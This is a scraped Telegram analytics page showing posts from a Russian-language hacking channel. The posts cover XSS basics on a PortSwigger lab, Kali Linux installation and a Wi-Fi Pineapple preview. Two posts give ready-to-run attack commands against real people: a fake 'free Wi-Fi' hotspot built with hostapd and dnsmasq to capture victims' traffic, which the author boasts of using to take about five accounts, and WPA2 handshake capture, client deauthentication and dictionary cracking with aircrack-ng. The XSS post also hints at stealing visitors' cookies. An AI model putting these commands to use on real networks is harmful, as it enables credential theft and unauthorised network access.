cookie

ما از کوکی‌ها برای بهبود تجربه مرور شما استفاده می‌کنیم. با کلیک کردن بر روی «پذیرش همه»، شما با استفاده از کوکی‌ها موافقت می‌کنید.

avatar

Нетскейп

نمایش بیشتر
روسيا125 696روسی134 122دسته بندی مشخص نشده است
پست‌های تبلیغاتی
2 958
مشترکین
اطلاعاتی وجود ندارد24 ساعت
-47 روز
-15630 روز

در حال بارگیری داده...

معدل نمو المشتركين

در حال بارگیری داده...

HELLO WORLD! Друзья, сегодня мы с вами проведем атаку на веб-сайт с помощью XSS (cross site scripting). Начнем с самого базового внедрения JavaScript кода. Настоятельно рекомендую не просто прочитать этот материал, а попробовать самим! Тренируемся сегодня на песочнице, так что справится каждый. Сложность: 0,5/10 Итак, приступим! 1. Заходим на сайт https://portswigger.net и регистрируем аккаунт! 2. Далее переходим на эту страницу — https://portswigger.net/web-security/all-labs#cross-site-scripting и выбираем лабораторию с хранимой (stored) XSS 3. После того, как сайт был развернут, мы оказываемся на главной страничке какого-то блога Поcкольку на этой странице (скрин №1) мы можем взаимодействовать только с кнопкой View post, мы нажимаем на неё и переходим на страницу с выбранным постом. — Спускаясь в самый низ мы можем видеть поле для ввода комментария (скрин №2). — Просмотрим код страницы, в котором увидим, что комментарий — простой текст, находящийся внутри атрибута параграфа (скрин №3) — Теперь пробуем внедрить JavaScript код, который будет открывать уведомление при переходе на страницу. Вводим комментарий и далее добавляем Javascript код <script>alert('xss');</script> — Вводим все остальные данные (скрин №4) и оставляем наш отзыв — Далее мы видим, что наш отзыв был успешно размещен на сайте (скрин №5) — При переходе на предыдущую страницу вылезает наш XSS-alert (скрин №6) — Спускаемся чуть ниже и видим, что наш комментарий остался, а вот JavaScript код отсутствует (скрин №7) — Открываем код страницы и видим, что наш скрипт оказался рядом с нашим комментарием (скрин №8), а это значит, что теперь каждый посетитель сайта будет видеть алерт XSS при переходе на эту страницу. Таким образом, при желании, мы можем внедрить JavaScript код, который будет собирать и отправлять куки в наши грязные ручки. Друзья, если хотите более сложных атак, то как обычно жду вашей отдачи.
نمایش همه...
🔥 24 1👏 1🤯 1
Я тут следом задумался... у нас же нет комментариев. Хотелось бы у вас узнать, нужны ли они? По мере возможности, думаю, смогу там помогать вам, если будут какие то сложности в процессе работы. Вы уже однажды собрали больше 100 реакций, так что давайте повторим. 🔥 100 реакций и я открываю комментарии
نمایش همه...
🔥 82👏 5👍 4🤯 2🎉 1
Привет, друзья! У меня для вас отличная новость. Теперь каждые выходные будут выходить самые топовые материалы, в которых я буду делиться с вами мануалами, которые найти в открытом доступе не представляется возможным. Сегодняшняя тема — XSS-атака на веб-сайт Сложность: не лезь, оно тебя сожрет не для новичков (полезно для развития) По традиции, старт с краткой информации. XSS (от англ. Cross-Site Scripting) — «межсайтовый скриптинг». Если говорить простым языком, то это тип атаки, при которой злоумышленник внедряет вредоносный код на страницу, который затем выполняется в браузере других пользователей. Например, это может происходить, когда владельцы сайтов оставляют возможность вводить текст на сайте напрямую в HTML без использования функций для преобразования специальных символов. XSS атаки делятся на 3 типа: —Рефлективные —Хранимые —На основе DOM (Document Object Model) Разберем сначала первый вид атак — Рефлективные XSS атаки. Этот тип атаки реализуется тогда, когда пользовательский ввод возвращается веб-сайтом в виде сообщения об ошибке или, например, результатом поиска. Пример вывода уязвимого для XSS веб-приложения:
<html>
  <p>
    <script>alert(1)</script>
  </p>
</html>
Хранимые XSS-атаки. Тип атак схож с предыдущим, но поступает не из строки ввода, а непосредственно из хранилища. Эта атака состоит из двух основных фаз: 1. Сохранение пэйлоада (полезная нагрузка) в хранилище данных в функции Store Handler (функции обработчика элемента управления) 2. Визуализация страницы в ViewHandler (обработчики, которые управляют представлениями, реализующие IView), с последующим добавлением пэйлоада к выходным данным. Заключительный тип — XSS на основе DOM. DOM —каркас веб-страницы, позволяющий JavaScript изменять текст, стиль и структуру, делая страницу живой и интерактивной. Это тип атаки, происходящий исключительно на стороне клиента. Всё происходит за счет того, что веб-приложения перемещают логику к клиенту, а атаки происходят, когда пользователь напрямую манипулирует DOM. Сегодня мы прошлись по теории, а завтра я выпущу практический материал на эту тему, так что жду ваши реакты 🔥. Connection to Netscape closed...
نمایش همه...
🔥 24👍 3
Всем привет! Продолжаем вчерашнюю тему. Установка Kali Linux для Virtual Box. Сложность: 0/10 — Скачиваем утилиту по ссылке. ­— Переходим на официальный сайт kali.org, выбираем раздел Installer Images и ставим скачиваться файл оффлайн установщика. — Заходим в Virtual box и нажимаем «создать», а далее все настройки копируйте со скринов: 1. (скрин №1) 2. Ставим 50% от объёма своей оперативной памяти (скрин №2) 3. (скрин №3) После создания нажимаем кнопку настроить и продолжаем все делать как на скринах 4. (скрин №4) 5. (скрин №5) 6. Выбираем скачанный ранее файл с установщиком (скрин №6) 7. Нажимаем ОК и запускаем тачанку Далее переходим к настройщику и выбираем графу «Graphical install». — После ознакомления с информацией о Kali установщик запросит имя хоста и домен (hostname и domain) для этой установки. Предоставьте соответствующую информацию для среды и продолжите её установку. —Далее необходимо создать новую учетную запись пользователя, чтобы использовать ее вместо учетной записи root — После установки пароля установщик запросит данные о часовом поясе, а затем сделает паузу на разбиении диска. Выбираем вариант «Guided – Use Entire Disk» — Далее выбираем «All files in one partition» — Подтверждаем все изменения, которые необходимо внести на компьютере и просто жмем финиш. По завершении система предложит вам выбрать программное обеспечение, которое установит стандартную среду рабочего стола с необходимыми инструментами (скрин №7). После завершения установки программного обеспечения система попросит установить GRUB: — Выбираем Yes — Выбираем наш единственный жесткий диск и запускаем установку GRUB на диск В конце загрузки система автоматически перезагрузится и вам будет предложено ввести данные, что вы указывали на этапе настройки. Всё, мы в системе! Connection to Netscape closed...
نمایش همه...
Сток Нетскейпа

1

🔥 10👍 2
Друзья, пост по вашим заявкам! Начинаем. Установка Kali Linux на Flash накопитель. Сложность: 0/10 1. Переходим на официальный сайт kali.org и выбираем раздел Live Boot (скрин) 2. Скачиваем последнюю актуальную версию «Kali 2024.2» (скрин) 3. Ставим скачиваться утилиту Rufus с сайта rufus.ie 4. Заходим в приложение Rufus и выбираем следующие параметры: *Устройство — ваш usb накопитель *Постоянный размер раздела — 10гб Остальные значения не трогаем и нажимаем старт (скрин). Все данные с флешки будут удалены! Как только образ будет, записан выполняем следующие действия: 1. Заходим в BIOS (гуглите клавиши для входа относительно вашего пк) 2. Переходим в раздел BOOT и находим раздел с приоритетом загрузки 3. Ставим нашу флешку на первое место в приоритете загрузки (скрин) 4. Переходим в раздел security и отключаем защиту (disabled). Гуглите для своей модели ПК! (скрин) 5. Выходим, сохранив изменения 6. Запускаем ПК 7. Выбираем пункт «Live system» — persistence, check kali.org.prst (скрин) 8. После входа в систему создаем папку на рабочем столе и перезапускаем систему. Если после перезагрузки все осталось на месте, значит всё ок. Connection to Netscape closed...
نمایش همه...
Сток Нетскейпа

🔥 12 2
Hello World!
Cегодня кратенький пост с историей из жизни. Пару лет назад, когда я только начинал свой путь в этой сфере, у меня не было никакого четкого плана, в какую сторону двигаться и чем заниматься. Постоянно кидало из стороны в сторону. Сначала я хотел заниматься работой с серверами и их уязвимостями, но когда углублялся, понимал, что пока еще не готов. Так было почти со всеми направлениями, пока я не решил, что тут надо двигаться только по строгому маршруту, выбирая направление, соответствующее моим знаниям и возможностям. Поэтому, чтобы не было мучительно трудно всем тем, кто только начинает свой путь, я буду публиковать все в формате RoadMap (дорожная карта). Соответственно, весь дальнейший материал будет идти по мере повышения сложности и вашего скилла :) Connection to Netscape closed...
نمایش همه...
🔥 20👍 4🎉 2
Доброго дня! Ночью у меня возник вопрос. Нужен ли вам мануал по установке Kali Linux на флешку или виртуальную тачку? Вдруг у кого то после крайних постов возникло желание вникнуть в работу с этой ОС, а с установкой возникли трудности. Дайте огней 🔥, если надо такое залить.
نمایش همه...
🔥 67🤯 2
Друзья, всем добрый вечер! Сегодня пост как раз связан с предыдущим. Увидел сегодня новость:
«Задержан хакер, который похищал данные пассажиров самолета, используя поддельную Wi-Fi сеть»
Сразу, как прочитал, вспомнил себя пару лет назад, сидящим в ресторане под названием ВкусОчка Мак (не реклама!). Ох, как это было эмоционально... первый выход в "поля" и первый перехват траффика. Как итог: около 5 учетных записей со всеми данными и куча мыслей о дальнейших приключений в сфере вардрайвинга. Думаю, вам интересно, как вообще такое можно реализовать. Я хочу вам сказать, что вы не зря подписались на мой канал — сейчас мы научимся с вами поднимать фэйковую точку доступа для перехвата данных пользователей. Стартуем, как обычно, с краткой инфы о методе атаки. Fake Wi-Fi Hotspot. Тут все завязано на том, что любитель халявного интернета выберет нашу сеть в качестве метода доступа к всемирной паутине. Единственный минус этого метода — ожидание нашего "клиента". Тут может только повлиять название вашей сети, которое будет всем видом показывать, что это лучший вариант доступа к интернету. Примеры: "FREE WIFI MC.DONALDS", "WIFI GUEST FREE", "TP-LINK 6563 FREE" — обычно люди, видя слово "бесплатно", выключают мозг и тыкают с уверенностью, что они переиграли этот мир. Далее займемся самим процессом подъема ложной точки доступа по этапам: — sudo apt-get update (обновление списка пакетов) — sudo apt-get install hostapd dnsmasq (Dnsmasq — небольшой DNS / DHCP-сервер,) — iwconfig (проверка беспроводного соединения) — ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up (переводим в режим мониторинга) — mkdir / root / accesspoint (создаем каталог в /root) — cd/ root / accesspoint/ (переход в директорию) — gedit hostapd.conf (cоздаем файл конфигурации), пишем этот код в файл конфигурации: interface=wlan0 driver=nl80211 ssid=Free_Wifi hw_mode=g channel=11 macaddr_acl=0 ignore_broadcast_ssid=0 auth_algs=1 wpa=2 wpa_passphrase=netscape123 wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP wpa_group_rekey=86400 ieee80211n=1 wme_enabled=1 — hostapd hostapd.conf (запускаем точку доступа) — gedit dnsmasq.conf (Создаем файл конфигурации в корневом каталоге), пишем туда следующий код: interface=wlan0 dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h dhcp-option=3,192.168.1.1 dhcp-option=6,192.168.1.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0 .0.1 — ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0 ( назначаем сетевой шлюз и маску интерфейсу) — route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 ( добавляем таблицу маршрутизации) — dnsmasq -C dnsmasq.conf -d ( запусаем службу с файлом конфигурации) — echo 1> / proc / sys / net / ipv4 / ip_forward (включаем IP переадресации) — PROFIT С этого момента в вашем терминале будут показаны все действия жертв в нашей сети. Анализируем, используем информацию исключительно в учебных целях :). Традиционно, жду больше ваших реакций — они подбадривают продолжать делать интересные штуки для вас. Connection to Netscape closed...
نمایش همه...
🔥 34👍 8 2🎉 1
Доброго дня! Очередной пост на тему, которую вы сами выбрали«Взлом беспроводных сетей». По классике, начнем с базовой информации — о типах шифрования. На данный момент существует несколько видов шифрования в беспроводных сетях: — WEP (Wired Equivalent Privacy), метод аутентификации — WEP open и WEP shared — WPA (Wi-Fi Protected Access), метод аутентификации — WPA-PSK и WPA-Enterprise — WPA2, метод аутентификации — WPA2-Personal и WPA2-Enterprise — WPA3, метод аутентификации — WPA3-Personal WPA3-Enterprise Далее предлагаю рассмотреть вариант взлома на примере WPA2-PSK. Данный протокол проводит 4-стороннее рукопожатие (хэндшейк), которое используется для аутентификации и установления ключа для шифрования данных. Вектор атаки будет направлен на слабое место в процессе установления безопасного соединения между устройством и беспроводным маршрутизатором, а именно на захват хэндшейков. Для совершения атаки нам нужен инструмент aircrack-ng. Также необходима сетевая карта с функцией мониторинга, если у вас эта функция отсутствует, то нужно будет приобрести сетевой адаптер. Я бы порекомендовал всем известный Wi-Fi адаптер от компании TP-Link (модель TL-WN722N v.1) Пройдёмся по этапам взлома: 1. Переводим сетевую карту в режим мониторинга командой (скриншот):
airmon-ng start wlan0
Если имеются процессы, мешающие работе, то команда: kill (номер PID) 2. Запускаем сканирование командой (скриншот):
wash –i wlan0
3. Запускаем перехват сетевого трафика для выбранной сети командой (скриншот):
airodump-ng –c 1 –bssid (тут вставляем BSSID вышей цели) –w capture wlan0
4.Отключаем клиента от сети командой (скриншот):
aireplay-ng -0 1 -a (BSSID цели) -v (Station цели) wlan0
5.Проверяем соответствие пароля захваченному рукопожатию командой (скриншот):
aircrack-ng –w /usr/share/wordlists/wifite.txt –b (BSSID цели) capture-10.cap
В примере мы используем встроенный в aircrack-ng словарь. Если найдено соответствие, вы увидите пароль. Друзья, если вам нравится такой формат и если хотите большего, то продолжайте проявлять активность 🔥
نمایش همه...
🔥 31👍 1 1
Всем салют! Сегодня хочу рассказать про новую игрушку, которую я на днях заказал и которую с нетерпением жду. Как придёт — более детально с вами всё разберём и потыкаем. А речь о популярном в пентестерских/хакерских кругах гаджете — Wi-Fi Pineapple (рассмотрим на примере базовой модели, которую я купил за 139 баксов). Устройство представляет собой небольшую черную коробочку размером со смартфон, имеющую несколько небольших антенн. Оно полностью заточено под работу в "полях", благодаря своей компактности и непримечательному виду. Что касается функционала этого устройства, то список объёмен. Я выделю любимое: —Сканирование и мониторинг сетей —Захват рукопожатий (handshake)* —Атаки типа «Человек посередине" (MITM)»** —Создание фальшивых точек доступа. Для первого запуска достаточно подключить девайс к домашней сети, выполнить установку ПО и инициировать настройку на веб-странице (~5мин на всё). После всех проделанных манипуляций устройство готово к работе. Что касается простоты использования, то могу с уверенностью сказать, что нет никаких неудобств. Единственное, что отличает работу от других инструментов — это наличие кабеля с устройством в вашем рюкзаке. *Handshake — это процесс установления связи сервера с клиентом, при котором у двух сторон генерируется общий ключ для шифрования и дешифрования данных. **«Человек посередине» (MITM) — атака, при которой злоумышленник получает доступ к каналу связи между легитимными сторонами.
root@netscape:~$ ./post-request.sh
Публикация... Успешно [✓]
Ожидание реакций (0/50) _
Connection to Netscape closed...
نمایش همه...
🔥 29🎉 6 4🤯 2
یک طرح متفاوت انتخاب کنید

طرح فعلی شما تنها برای 5 کانال تجزیه و تحلیل را مجاز می کند. برای بیشتر، لطفا یک طرح دیگر انتخاب کنید.